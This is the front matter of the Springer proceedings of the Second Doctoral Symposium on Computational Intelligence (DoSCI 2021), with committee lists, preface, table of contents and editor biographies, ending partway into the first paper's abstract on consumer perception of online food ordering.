Download as pdf or txt
Download as pdf or txt
You are on page 1of 902

Advances in Intelligent Systems and Computing 1374

Deepak Gupta · Ashish Khanna ·


Vineet Kansal · Giancarlo Fortino ·
Aboul Ella Hassanien Editors

Proceedings of Second
Doctoral Symposium
on Computational
Intelligence
DoSCI 2021
Advances in Intelligent Systems and Computing

Volume 1374

Series Editor
Janusz Kacprzyk, Systems Research Institute, Polish Academy of Sciences,
Warsaw, Poland

Advisory Editors
Nikhil R. Pal, Indian Statistical Institute, Kolkata, India
Rafael Bello Perez, Faculty of Mathematics, Physics and Computing,
Universidad Central de Las Villas, Santa Clara, Cuba
Emilio S. Corchado, University of Salamanca, Salamanca, Spain
Hani Hagras, School of Computer Science and Electronic Engineering,
University of Essex, Colchester, UK
László T. Kóczy, Department of Automation, Széchenyi István University,
Gyor, Hungary
Vladik Kreinovich, Department of Computer Science, University of Texas
at El Paso, El Paso, TX, USA
Chin-Teng Lin, Department of Electrical Engineering, National Chiao
Tung University, Hsinchu, Taiwan
Jie Lu, Faculty of Engineering and Information Technology,
University of Technology Sydney, Sydney, NSW, Australia
Patricia Melin, Graduate Program of Computer Science, Tijuana Institute
of Technology, Tijuana, Mexico
Nadia Nedjah, Department of Electronics Engineering, University of Rio de Janeiro,
Rio de Janeiro, Brazil
Ngoc Thanh Nguyen , Faculty of Computer Science and Management,
Wrocław University of Technology, Wrocław, Poland
Jun Wang, Department of Mechanical and Automation Engineering,
The Chinese University of Hong Kong, Shatin, Hong Kong
The series “Advances in Intelligent Systems and Computing” contains publications
on theory, applications, and design methods of Intelligent Systems and Intelligent
Computing. Virtually all disciplines such as engineering, natural sciences, computer
and information science, ICT, economics, business, e-commerce, environment,
healthcare, life science are covered. The list of topics spans all the areas of modern
intelligent systems and computing such as: computational intelligence, soft comput-
ing including neural networks, fuzzy systems, evolutionary computing and the fusion
of these paradigms, social intelligence, ambient intelligence, computational neuro-
science, artificial life, virtual worlds and society, cognitive science and systems,
Perception and Vision, DNA and immune based systems, self-organizing and
adaptive systems, e-Learning and teaching, human-centered and human-centric
computing, recommender systems, intelligent control, robotics and mechatronics
including human-machine teaming, knowledge-based paradigms, learning para-
digms, machine ethics, intelligent data analysis, knowledge management, intelligent
agents, intelligent decision making and support, intelligent network security, trust
management, interactive entertainment, Web intelligence and multimedia.
The publications within “Advances in Intelligent Systems and Computing” are
primarily proceedings of important conferences, symposia and congresses. They
cover significant recent developments in the field, both of a foundational and
applicable character. An important characteristic feature of the series is the short
publication time and world-wide distribution. This permits a rapid and broad
dissemination of research results.
Indexed by DBLP, INSPEC, WTI Frankfurt eG, zbMATH, Japanese Science and
Technology Agency (JST).
All books published in the series are submitted for consideration in Web of Science.

More information about this series at http://www.springer.com/series/11156


Deepak Gupta · Ashish Khanna · Vineet Kansal ·
Giancarlo Fortino · Aboul Ella Hassanien
Editors

Proceedings of Second
Doctoral Symposium
on Computational
Intelligence
DoSCI 2021
Editors
Deepak Gupta Ashish Khanna
Department of Computer Science Maharaja Agrasen Institute of Technology
Engineering Rohini, Delhi, India
Maharaja Agrasen Institute of Technology
Rohini, Delhi, India Giancarlo Fortino
University of Calabria
Vineet Kansal Rende, Cosenza, Italy
Institute of Engineering and Technology
Lucknow, Uttar Pradesh, India

Aboul Ella Hassanien


Department of Information Technology
Cairo University
Giza, Egypt

ISSN 2194-5357 ISSN 2194-5365 (electronic)


Advances in Intelligent Systems and Computing
ISBN 978-981-16-3345-4 ISBN 978-981-16-3346-1 (eBook)
https://doi.org/10.1007/978-981-16-3346-1

© The Editor(s) (if applicable) and The Author(s), under exclusive license to Springer Nature
Singapore Pte Ltd. 2022
This work is subject to copyright. All rights are solely and exclusively licensed by the Publisher, whether
the whole or part of the material is concerned, specifically the rights of translation, reprinting, reuse
of illustrations, recitation, broadcasting, reproduction on microfilms or in any other physical way, and
transmission or information storage and retrieval, electronic adaptation, computer software, or by similar
or dissimilar methodology now known or hereafter developed.
The use of general descriptive names, registered names, trademarks, service marks, etc. in this publication
does not imply, even in the absence of a specific statement, that such names are exempt from the relevant
protective laws and regulations and therefore free for general use.
The publisher, the authors and the editors are safe to assume that the advice and information in this book
are believed to be true and accurate at the date of publication. Neither the publisher nor the authors or
the editors give a warranty, expressed or implied, with respect to the material contained herein or for any
errors or omissions that may have been made. The publisher remains neutral with regard to jurisdictional
claims in published maps and institutional affiliations.

This Springer imprint is published by the registered company Springer Nature Singapore Pte Ltd.
The registered company address is: 152 Beach Road, #21-01/04 Gateway East, Singapore 189721,
Singapore
Dr. Deepak Gupta would like to dedicate this
book to his father Sh. R. K. Gupta and his
mother Smt. Geeta Gupta for their constant
encouragement, and his family members
including his wife, brothers, sisters and kids,
and to his students close to his heart.
Dr. Ashish Khanna would like to dedicate this
book to his mentors Dr. A. K. Singh and
Dr. Abhishek Swaroop for their constant
encouragement and guidance and his family
members including his mother, wife and kids.
He would also like to dedicate this work to
his (late) father Sh. R. C. Khanna with folded
hands for his constant blessings.
Prof. (Dr.) Vineet Kansal would like to
dedicate this book to his father Sh. Vinod
Kumar and his mother late (Smt.) Usha
Gupta.
Prof. (Dr.) Aboul Ella Hassanien would like
to dedicate this book to his wife Nazaha
Hassan.
DoSCI 2021 Steering Committee Members

Chief Patrons

Prof. Vinay Kumar Pathak, Vice Chancellor, AKTU, Lucknow

Patrons

Prof. H. K. Paliwal, Director, IET, Lucknow


Prof. D. S. Yadav, Head, CSE, IET, Lucknow

General Chairs

Prof. Vineet Kansal, IET, Lucknow


Prof. Giancarlo Fortino, Università della Calabria, Italy

Honorary Chairs

Prof. Oscar Castillo, Tijuana Institute Technology, Tijuana, Mexico


Prof. Aboul Ella Hassanien, Cairo University, Egypt

vii
viii DoSCI 2021 Steering Committee Members

Symposium Chairs

Prof. Siddhartha Bhattacharyya, Professor, CHRIST University, Bangalore


Prof. Valentina Emilia Balas, Aurel Vlaicu University of Arad, Romania

Technical Program Chairs

Prof. Tapobrata Lahiri, IIIT Prayagraj, India


Prof. Sanjay K. Saha, Jadavpur University, India
Prof. Surya Agnihotri, IIT Indore, India
Prof. Joel J. P. C. Rodrigues, Federal University of Piaui (UFPI), Teresina, Pl, Brazil
Prof. Victor Hugo C. de Albuquerque, Universidade de Fortaleza, Brazil
Prof. N. P. Gopalan, NIT Trichy, India
Prof. Sarabjeet Singh, Panjab University, Chandigarh, India
Prof. Vivek Kumar Singh, BHU, Varanasi, India

Editorial Chairs

Prof. Girish Chandra, IET, Lucknow


Prof. Y. N. Singh, IET, Lucknow
Prof. Abhishek Swaroop, Bhagwan Parshuram Institute of Technology, Delhi

Conveners

Dr. Ashish Khanna, Maharaja Agrasen Institute of Technology (GGSIPU), New


Delhi
Dr. Deepak Gupta, Maharaja Agrasen Institute of Technology (GGSIPU), New Delhi

Publication Chairs

Prof. Aboul Ella Hassanien, Cairo University, Egypt


Prof. Giancarlo Fortino, Università della Calabria, Italy
Prof. Neeraj Kumar, Thapar Institute of Engineering and Technology, Thapar
University, Patiala, Punjab
Dr. Vicente García Díaz, University of Oviedo, Spain
DoSCI 2021 Steering Committee Members ix

Publicity Chairs

Dr. M. Tanveer, Indian Institute of Technology Indore, India


Dr. Jafar A. Alzubi, Al-Balqa Applied University, Salt, Jordan

Co-convener

Mr. Moolchand Sharma, Maharaja Agrasen Institute of Technology, India

Organizing Chairs

Dr. Parul Yadav, IET, Lucknow


Dr. Upendra Kumar, IET, Lucknow

Organizing Team

Dr. Mahima Shanker Pandey, IET, Lucknow


Dr. Tulika Narang, IET, Lucknow
Dr. Pratibha Pandey, IET, Lucknow
Dr. Sameeksha Tandon, IET, Lucknow
Dr. Mudita Saran, IET, Lucknow
Dr. Esha Tripathi, IET, Lucknow
Dr. Namita Srivastava, IET, Lucknow
Dr. Deepali Awasthi, IET, Lucknow
Dr. Deepa Verma, IET, Lucknow
Dr. Abhishek Singh, IET, Lucknow
Dr. Sudhani Verma, IET, Lucknow
Dr. Abhay Kr. Vajpayee, IET, Lucknow
Dr. Sonam Srivastava, IET, Lucknow
Preface

We hereby are delighted to announce that the Institute of Engineering and Tech-
nology, a constituent college of Dr. A. P. J. Abdul Kalam Technical University,
Lucknow, India, has hosted the eagerly awaited and much coveted Doctoral Sympo-
sium on Computational Intelligence (DoSCI 2021)—An International Conference in
Online Mode. The second version of the symposium was able to attract a diverse range
of engineering practitioners, academicians, scholars and industry delegates, with the
reception of abstracts including more than 1,600 authors from different parts of the
world. The committee of professionals dedicated toward the symposium is striving
to achieve a high-quality technical program with a track on computational intelli-
gence. Therefore, a lot of research is happening in the above-mentioned track and its
related sub-areas. More than 400 full-length papers have been received, among which
the contributions are focused on theoretical, computer simulation-based research
and laboratory-scale experiments. Among these manuscripts, 74 papers have been
included in the Springer proceedings after a thorough two-stage review and editing
process. All the manuscripts submitted to DoSCI 2021 were peer-reviewed by at least
two independent reviewers, who were provided with a detailed review proforma.
The comments from the reviewers were communicated to the authors, who incorpo-
rated the suggestions in their revised manuscripts. The recommendations from two
reviewers were taken into consideration while selecting a manuscript for inclusion
in the proceedings. The exhaustiveness of the review process is evident, given the
large number of articles received addressing a wide range of research areas. The
stringent review process ensured that each published manuscript met the rigorous
academic and scientific standards. It is an exalting experience to finally see these
elite contributions materialize into a book volume as DoSCI 2021 proceedings by
Springer entitled “Doctoral Symposium on Computational Intelligence.”
DoSCI 2021 invited four keynote speakers, who are eminent researchers in the
field of computer science and engineering, from different parts of the world. In addi-
tion to the plenary sessions on the day of the symposium, nine concurrent technical
sessions are held on the day to assure the oral presentation of around 74 accepted
papers. Keynote speakers and session chair(s) for each of the concurrent sessions
have been leading researchers from the thematic area of the session. A technical

xi
xii Preface

exhibition is held during all the day of the symposium, which has put on display
the latest technologies, expositions, ideas and presentations. The research part of the
symposium was organized in a total of 16 special sessions. These special sessions
provided the opportunity for researchers conducting research in specific areas to
present their results in a more focused environment.
An international symposium of such magnitude and release of the DoSCI 2021
proceedings by Springer has been the remarkable outcome of the untiring efforts
of the entire organizing team. The success of an event undoubtedly involves the
painstaking efforts of several contributors at different stages, dictated by their devo-
tion and sincerity. Fortunately, since the beginning of its journey, DoSCI 2021 has
received support and contributions from every corner. We thank them all who have
wished the best for DoSCI 2021 and contributed by any means toward its success.
The edited proceedings volume by Springer would not have been possible without the
perseverance of all the steering, advisory and technical program committee members.
All the contributing authors owe thanks from the organizers of DoSCI 2021 for
their interest and exceptional articles. We would also like to thank the authors of the
papers for adhering to the time schedule and for incorporating the review comments.
We wish to extend our heartfelt acknowledgment to the authors, peer-reviewers,
committee members and production staff whose diligent work put shape to the DoSCI
2021 proceedings. We especially want to thank our dedicated team of peer-reviewers
who volunteered for the arduous and tedious step of quality checking and critique on
the submitted manuscripts. We wish to thank our faculty colleagues Mr. Moolchand
Sharma and Ms. Prerna Sharma for extending their enormous assistance during the
symposium. The time spent by them and the midnight oil burnt is greatly appreciated,
for which we will ever remain indebted. The management, faculties, administrative
and support staff of the college have always been extending their services whenever
needed, for which we remain thankful to them.
Lastly, we would like to thank Springer for accepting our proposal for publishing
the DoSCI 2021 symposium proceedings. Help received from Mr. Aninda Bose, the
acquisition senior editor, in the process has been very useful.

Rohini, India Ashish Khanna


Deepak Gupta
Organizers, DoSCI 2021
Contents

Investigation of Consumer Perception Toward Digital Means


of Food Ordering Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
Arpita Srivastava, Radhika Malhotra, Arvind Kumar Bhatt,
and Priyanka Srivastava
A Systematic Review of Blockchain Technology to Find Current
Scalability Issues and Solutions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
Bhargavi K. Chauhan and Dhirenbhai B. Patel
Secured Blind Image Watermarking Using Entropy Technique
in DCT Domain . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
Megha Gupta and R. Rama Kishore
Prediction of Heart Disease Using Genetic Algorithm . . . . . . . . . . . . . . . . . 49
Nagaraj M. Lutimath, H. V. Ramachandra, S. Raghav, and Neha Sharma
Secured Information Infrastructure for Exchanging Information
for Digital Governance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59
Mohd Shukri Alias and S. B. Goyal
Spiral CAPTCHA with Adversarial Perturbation and Its Security
Analysis with Convolutional Neural Network . . . . . . . . . . . . . . . . . . . . . . . . . 67
Shivani and C. Rama Krishna
Predicting Classifiers Efficacy in Relation with Data Complexity
Metric Using Under-Sampling Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . 85
Deepika Singh, Anju Saha, and Anjana Gosain
Enhanced Combined Multiplexing Algorithm (ECMA)
for Wireless Body Area Network (WBAN) . . . . . . . . . . . . . . . . . . . . . . . . . . . 93
Poonam Rani, Ankur Dumka, Rishika Yadav, and Vikas Yadav
A Survey: Approaches to Facial Detection and Recognition
with Machine Learning Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103
Prateek Singhal, Prabhat Kumar Srivastava, Arvind Kumar Tiwari,
and Ratnesh Kumar Shukla
xiii
xiv Contents

An Energy- and Space-Efficient Trust-Based Secure Routing


for OppIoT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127
Nisha Kandhoul and Sanjay K. Dhurandher
A Survey on Anomaly Detection Techniques in IoT . . . . . . . . . . . . . . . . . . . 139
Priya Sharma and Sanjay Kumar Sharma
Novel IoT End Device Architecture for Enhanced CIA:
A Lightweight Security Approach . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147
Prateek Mishra, Sanjay Kumar Yadav, Ravi Kumar Sachdeva,
and Rajesh Tiwari
Addressing Concept Drifts Using Deep Learning for Heart Disease
Prediction: A Review . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157
Ketan Sanjay Desale and Swati V. Shinde
Tailoring the Controller Parameters Using Hybrid Flower
Pollination Algorithm for Performance Enhancement
of Multisource Two Area Power System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169
Megha Khatri, Pankaj Dahiya, and S. Hareesh Reddy
Automatic Extractive Summarization for English Text: A Brief
Survey . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 183
Sunil Dhankhar and Mukesh Kumar Gupta
Formal Verification of Liveness Properties in Causal Order
Broadcast Systems Using Event-B . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 199
Pooja Yadav, Raghuraj Suryavanshi, and Divakar Yadav
A Comparative Study on Face Recognition AI Robot . . . . . . . . . . . . . . . . . 211
Somesh Sunar, Shailendra K. Tripathi, Usha Tiwari, and Harshit Srivastava
State-of-the-Art Power Management Techniques . . . . . . . . . . . . . . . . . . . . . 223
Maaz Ahmed and Waseem Ahmed
Application of Robotics in Digital Farming . . . . . . . . . . . . . . . . . . . . . . . . . . . 237
Drishti Agarwal, Aakash Mangla, and Preeti Nagrath
Study and Performance Analysis of Image Fusion Techniques
for Multi-focus Images . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 247
Vineeta Singh and Vandana Dixit Kaushik
IoT-Based Agricultural Automation Using LoRaWAN . . . . . . . . . . . . . . . . 261
Jaisal Chauhan, K. Agathiyan, and Neha Arora
Prediction of Customer Lifetime Value Using Machine Learning . . . . . . . 271
Kandula Balagangadhar Reddy, Debabrata Swain, Samiksha Shukla,
and Lija Jacob
Contents xv

An Intelligent Flood Forecasting System Using Artificial Neural


Network in WSN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 279
K. S. Raghu Kumar and Rajashree V. Biradar
Reinforcement Learning in Deep Web Crawling: Survey . . . . . . . . . . . . . . 291
Kapil Madan and Rajesh Bhatia
Wireless Sensor Network for Various Hardware Parameters
for Orientational and Smart Sensing Using IoT . . . . . . . . . . . . . . . . . . . . . . 301
Mohammad Danish Gazi, Manisha Rajoriya, Pallavi Gupta, and Ashish Gupta
Comparative Analysis: Role of Meta-Heuristic Algorithms
in Image Watermarking Optimization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 315
Preeti Garg and R. Rama Kishore
A Novel Seven-Dimensional Hyperchaotic . . . . . . . . . . . . . . . . . . . . . . . . . . . 329
M. Lellis Thivagar, Abdulsattar Abdullah Hamad, B. Tamilarasan,
and G. Kabin Antony
A Literature Review on H∞ Neural Network Adaptive Control . . . . . . . . 341
Parul Kashyap
A Novel DWT and Deep Learning Based Feature Extraction
Technique for Plant Disease Identification . . . . . . . . . . . . . . . . . . . . . . . . . . . 355
Kirti, Navin Rajpal, and Jyotsna Yadav
Supervised and Unsupervised Machine Learning Techniques
for Multiple Sclerosis Identification: A Performance Comparative
Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 369
Shikha Jain, Navin Rajpal, and Jyotsna Yadav
Cloud Computing Overview of Wireless Sensor Network (WSN) . . . . . . . 383
Mahendra Prasad Nath, Sushree Bibhuprada B. Priyadarshini,
and Debahuti Mishra
An Enhanced Support Vector Machine for Face Recognition
in Fisher Subspace . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 393
Tanvi Jain and Jyotsna Yadav
Large Scale Double Density Dual Tree Complex Wavelet
Transform Based Robust Feature Extraction for Face Recognition . . . . . 409
Juhi Chaudhary and Jyotsna Yadav
A Miscarriage Prevention System Using Machine Learning
Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 423
Sarmista Biswas and Samiksha Shukla
Efficacious Governance During Pandemics Like Covid-19 Using
Intelligent Decision Support Framework for User Generated
Content . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 435
Rajni Jindal and Anshu Malhotra
xvi Contents

Skin Disease Diagnosis: Challenges and Opportunities . . . . . . . . . . . . . . . . 449


Vatsala Anand, Sheifali Gupta, and Deepika Koundal
Computerized Assisted Segmentation of Brain Tumor Using Deep
Convolutional Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 461
Deepa Verma and Mahima Shanker Pandey
Leader Election Algorithm in Fault Tolerant Distributed System . . . . . . . 471
Sudhani Verma, Divakar Yadav, and Girish Chandra
Engine Prototype and Testing Measurements of Autonomous
Rocket-Based 360 Degrees Cloud Seeding Mechanism . . . . . . . . . . . . . . . . 481
Satyabrat Shukla, Gautam Singh, and Purnima Lala Mehta
An Efficient Caching Approach for Content-Centric-Based
Internet of Things Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 499
Sumit Kumar, Rajeev Tiwari, and Gaurav Goel
A Forecasting Technique for Powdery Mildew Disease Prediction
in Tomato Plants . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 509
Anshul Bhatia, Anuradha Chug, Amit Prakash Singh,
Ravinder Pal Singh, and Dinesh Singh
Investigate the Effect of Rain, Foliage, Atmospheric Gases,
and Diffraction on Millimeter (mm) Wave Propagation for 5G
Cellular Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 521
Animesh Tripathi, Pradeep K. Tiwari, Shiv Prakash, and N. K. Shukla
Packet Scheduling Algorithm to improvise the Packet Delivery
Ratio in Mobile Ad hoc Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 535
Suresh Kurumbanshi, Shubhangi Rathkanthiwar, and Shashikant Patil
Computer-Aided Detection and Diagnosis of Lung Nodules Using
CT Scan Images: An Analytical Review . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 545
Nikhat Ali and Jyotsna Yadav
Efficient Interleaver Design for SC-FDMAIDMA Systems . . . . . . . . . . . . . 559
Roopali Agarwal and Manoj Kumar Shukla
Enhanced Bio-inspired Trust and Reputation Model for Wireless
Sensor Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 569
Vivek Arya, Sita Rani, and Nilam Choudhary
Analytical Machine Learning for Medium-Term Load Forecasting
Towards Agricultural Sector . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 581
Megha Sharma, Namita Mittal, Anukram Mishra, and Arun Gupta
Formal Modelling of Cluster-Coordinator-Based Load Balancing
Protocol Using Event-B . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 593
Shantanu Shukla, Raghuraj Suryavanshi, and Divakar Yadav
Contents xvii

Regression Test Case Selection: A Comparative Analysis


of Metaheuristic Algorithms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 605
Abhishek Singh Verma, Ankur Choudhary, and Shailesh Tiwari
A Comprehensive Study on SQL Injection Attacks, Their Mode,
Detection and Prevention . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 617
Sabyasachi Dasmohapatra and Sushree Bibhuprada B. Priyadarshini
Sentimental Analysis on Sarcasm Detection with GPS Tracking . . . . . . . . 633
Mudita Sharan and M. Ravinder
Impact of Machine Learning Algorithms on WDM High-Speed
Optical Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 645
Saloni Rai and Amit Kumar Garg
Duo Features with Hybrid-Meta-Heuristic-Deep Belief Network
Based Pattern Recognition for Marathi Speech Recognition . . . . . . . . . . . 665
Ravindra P. Bachate, Ashok Sharma, and Amar Singh
Computer-Aided Diagnostic of COVID-19 Using Chest X-Ray
Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 675
Mangala Shetty and Spoorthi Shetty
Low Cost Compact Multiband Printed Antenna for Wireless
Communication Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 683
Rachna Prabha, Pratibha Pandey, G. S. Tripathi, and Sudhanshu Verma
A Detailed Analysis of Word Sense Disambiguation Algorithms
and Approaches for Indian Languages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 693
Archana Sachindeo Maurya and Promila Bahadur
Fiber Bragg Grating (FBG) Sensor for the Monitoring of Cardiac
Parameters in Healthcare Facilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 711
Ambarish G. Mohapatra, Pradyumna Kumar Tripathy,
Maitri Mohanty, and Ashish Khanna
Early-Stage Coronary Ailment Prediction Using Dimensionality
Reduction and Data Mining Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 721
Krittika Dutta, Satish Chandra, and Mahendra Kumar Gourisaria
Inferring the Occurrence of Chronic Kidney Failure: A Data
Mining Solution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 735
Rwittika Pramanik, Sandali Khare, and Mahendra Kumar Gourisaria
Comparative Analysis for Optimal Tuning of DC Motor Position
Control System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 749
Avi Singhal, Dhruv Mittal, Ritwik Roy, and Pankaj Dahiya
A Hybrid Approach of ANN-PSO Technique for Anomaly Detection . . . 757
Sonika Dahiya, Priyansh Soni, Hridya Shiju Nadappattel,
and Mohammad Fraz
xviii Contents

Comparison of Density-Based and Distance-Based Outlier


Identification Methods in Fuzzy Clustering . . . . . . . . . . . . . . . . . . . . . . . . . . 769
Anjana Gosain and Sonika Dahiya
Analysis of Security Issues in Blockchain Wallet . . . . . . . . . . . . . . . . . . . . . . 779
Taruna and Rishabh
A Contextual Framework to Find Similarity Between Users
on Twitter . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 793
Sonika Dahiya, Gaurav Kumar, and Arnav Yadav
On the Design of a Smart Mirror for Cardiovascular Risk
Prediction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 807
Gianluca Zaza
Named Entity Recognition in Natural Language Processing:
A Systematic Review . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 817
Abhishek Sharma, Amrita, Sudeshna Chakraborty, and Shivam Kumar
Assessing Spatiotemporal Transmission Dynamics of COVID-19
Outbreak Using AI Analytics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 829
Mayuri Gupta, Yash Kumar Singhal, and Adwitiya Sinha
Detection of Building Defects Using Convolutional Neural Networks . . . 839
Dokuparthi Sai Santhoshi Bhavani, Abhijit Adhikari, and D. Sumathi
Tools and Techniques for Machine Translation . . . . . . . . . . . . . . . . . . . . . . . 857
Archana Sachindeo Maurya, Srishti Garg, and Promila Bahadur
Cyberbullying-Mediated Depression Detection in Social Media
Using Machine Learning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 869
Akshi Kumar and Nitin Sachdeva
Improved Patient-Independent Seizure Detection System Using
Novel Feature Extraction Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 879
Durgesh Nandini, Jyoti Yadav, Asha Rani, and Vijander Singh
Solution to Economic Dispatch Problem Using Modified PSO
Algorithm . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 889
Amritpal Singh and Aditya Khamparia
Recommendations for DDOS Attack-Based Intrusion Detection
System Through Data Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 899
Sagar Pande, Aditya Kamparia, and Deepak Gupta
Drug-Drug Interaction Prediction Based on Drug Similarity
Matrix Using a Fully Connected Neural Network . . . . . . . . . . . . . . . . . . . . . 911
Alok Kumar and Moolchand Sharma

Author Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 921


About the Editors

Dr. Deepak Gupta is an eminent academician and plays versatile roles and respon-
sibilities juggling between lectures, research, publications, consultancy, community
service, Ph.D. and post-doctorate supervision, etc. With 13 years of rich expertise in
teaching and two years in industry; he focuses on rational and practical learning.
He has contributed massive literature in the fields of human–computer interac-
tion, intelligent data analysis, nature-inspired computing, machine learning and soft
computing. He is working as Assistant Professor at Maharaja Agrasen Institute of
Technology (GGSIPU), Delhi, India. He has served as Editor-in-Chief, Guest Editor,
Associate Editor in SCI and various other reputed journals. He has authored/edited
44 books with national/international level publishers. He has published 140 scientific
research publications in reputed international journals and conferences including 68
SCI indexed journals. He has also filed 3 patents.

Dr. Ashish Khanna has 16 years of rich expertise in teaching, entrepreneurship


and research and development. He received his Ph.D. degree from National Insti-
tute of Technology, Kurukshetra. He has completed his M.Tech. and B.Tech. at
GGSIPU, Delhi. He has completed his postdoc from Internet of Things Lab at
Inatel, Brazil, and University of Valladolid, Spain. He has published around 61
SCI indexed papers in IEEE Transaction, Springer, Elsevier, Wiley and many more
reputed journals with cumulative impact factor of above 160. He has around 120
research articles in top SCI/Scopus journals, conferences and book chapters. He is the
co-author of around 30 edited and textbooks. His research interest includes MANET,
FANET, IoT, machine learning and many more. He has served in the research field as
Keynote Speaker/Faculty Resource Person/Session Chair/Reviewer/TPC Member/
Post-doctorate supervision. He is Convener and Organizer of ‘ICICC’ and ICDAM
conference series. He has 3 published patents to his credit.

Prof. (Dr.) Vineet Kansal studied at Indian Institute of Technology, Delhi, and
is currently working as Professor with Institute of Engineering & Technology,
Dr. A. P. J. Abdul Kalam Technical University, Lucknow. He was awarded appre-
ciation by NPTEL, IIT Kanpur and Centre of Continuing education, IIT Kanpur
for inspiring the faculty members and students of higher technical education to
xix
xx About the Editors

adopt NPTEL Online certification courses for evangelizing its modus operandi and
for conceptualizing online and offline blended faculty training programs addressing
pedagogical issues in engineering education in the state of Uttar Pradesh, India.

Prof. (Dr.) Giancarlo Fortino is Full Professor at the University of Calabria


(Unical), Italy. He is a director of the Smart, Pervasive, and Mobile Systems Engi-
neering lab at Unical as well as a co-chair of joint labs to study the Internet of things
(IoT) that were established between Unical and Wuhan University of Technology,
Southern Medical University and Huazhong Agricultural University in China. In
addition, he is a co-founder and a chief executive officer of SenSysCal, a Unical
spinoff focused on innovative IoT systems. His research interests include agent-based
computing, wireless (body) sensor networks and IoT.

Prof. (Dr.) Aboul Ella Hassanien is Founder and Head of the Egyptian Scientific
Research Group (SRGE). Hassanien has more than 1000 scientific research papers
published in prestigious international journals and over 50 books covering such
diverse topics as data mining, medical images, intelligent systems, social networks
and smart environment. Prof. Hassanien won several awards including the Best
Researcher of the Youth Award of Astronomy and Geophysics of the National
Research Institute, Academy of Scientific Research (Egypt, 1990). He was also
granted a Scientific Excellence Award in Humanities from the University of Kuwait
for the 2004 Award and received the superiority of scientific—University Award
(Cairo University, 2013). Also, he was honored in Egypt as the best researcher at
Cairo University in 2013. He has also received the Islamic Educational, Scientific
and Cultural Organization (ISESCO) prize on Technology (2014) and received the
State Award for Excellence in Engineering Sciences 2015.
Investigation of Consumer Perception
Toward Digital Means of Food Ordering
Services

Arpita Srivastava, Radhika Malhotra, Arvind Kumar Bhatt,


and Priyanka Srivastava

Abstract Eating at a restaurant once used to be an occasional event, but it is a routine


thing for today’s generation. With the advent of food delivery apps, combined with
the e-commerce technology, the online food ordering services have simplified the
doorstep delivery of food (Mustafa in Proceedings of the 2016 International Confer-
ence on Industrial Engineering and Operations Management Detroit, Michigan, USA,
[1]). Today, the lifestyle of millennial has changed. They usually have a very hectic
work schedules, and as a result, for their everyday meals, number of people are
opting for the reliability and convenience of cloud kitchen (PTI in Zomato expands
food delivery business to 213 cities across India, [2]). The consumers include millen-
